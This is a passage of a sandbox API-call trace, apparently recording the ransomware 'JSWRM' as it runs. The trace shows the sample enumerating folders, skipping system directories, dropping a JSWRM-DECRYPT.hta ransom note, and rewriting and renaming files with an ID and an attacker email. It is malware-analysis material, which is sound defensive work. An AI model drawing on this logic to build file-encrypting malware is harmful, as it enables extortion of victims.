hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.389] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20034d7a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20034d7a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20034d7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.389] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.390] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20034d7a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20034d7a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20034d7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0069.390] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.390] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2000eabb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2000eabb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.390] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.391] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2=".") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="..") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="...") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="windows") returned -1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="recovery") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="perflogs") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="documents and settings") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="$RECYCLE.BIN") returned 1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="system volume information") returned -1 [0069.391] lstrcmpiW (lpString1="SIGNUP", lpString2="msocache") returned 1 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0069.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\signup\\jswrm-decrypt.hta")) returned 0xffffffff [0069.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.392] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\signup\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.392] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.392] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.393] CloseHandle (hObject=0x3d4) returned 1 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0069.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\signup\\jswrm-decrypt.hta")) returned 0x20 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.394] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x2005afea, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0069.394] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.394] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x2005afea, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="..", cAlternateFileName="")) returned 1 [0069.394] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.394] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.394] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="install.ins", cAlternateFileName="")) returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2=".") returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="..") returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="...") returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="windows") returned -1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="recovery") returned -1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="perflogs") returned -1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="documents and settings") returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="$RECYCLE.BIN") returned 1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="system volume information") returned -1 [0069.394] lstrcmpiW (lpString1="install.ins", lpString2="msocache") returned -1 [0069.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.ins", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.ins", cchWideChar=11, lpMultiByteStr=0x345f2a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="install.ins", lpUsedDefaultChar=0x0) returned 11 [0069.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.ins", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.ins", cchWideChar=11, lpMultiByteStr=0x345f278, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="install.ins", lpUsedDefaultChar=0x0) returned 11 [0069.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.395] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.397] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=452) returned 1 [0069.397] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c0) returned 0x240b68 [0069.397] ReadFile (in: hFile=0x298, lpBuffer=0x240b68, nNumberOfBytesToRead=0x1c0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x240b68*, lpNumberOfBytesRead=0x345ef6c*=0x1c0, lpOverlapped=0x0) returned 1 [0069.398] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.398] WriteFile (in: hFile=0x298, lpBuffer=0x240b68*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x240b68*, lpNumberOfBytesWritten=0x345ef68*=0x1c0, lpOverlapped=0x0) returned 1 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240b68 | out: hHeap=0x1e0000) returned 1 [0069.398] CloseHandle (hObject=0x298) returned 1 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), lpNewFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0069.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.399] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005afea, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2005afea, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2005afea, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.399] RtlAllocateHeap (HeapHandle=0x1e0000, 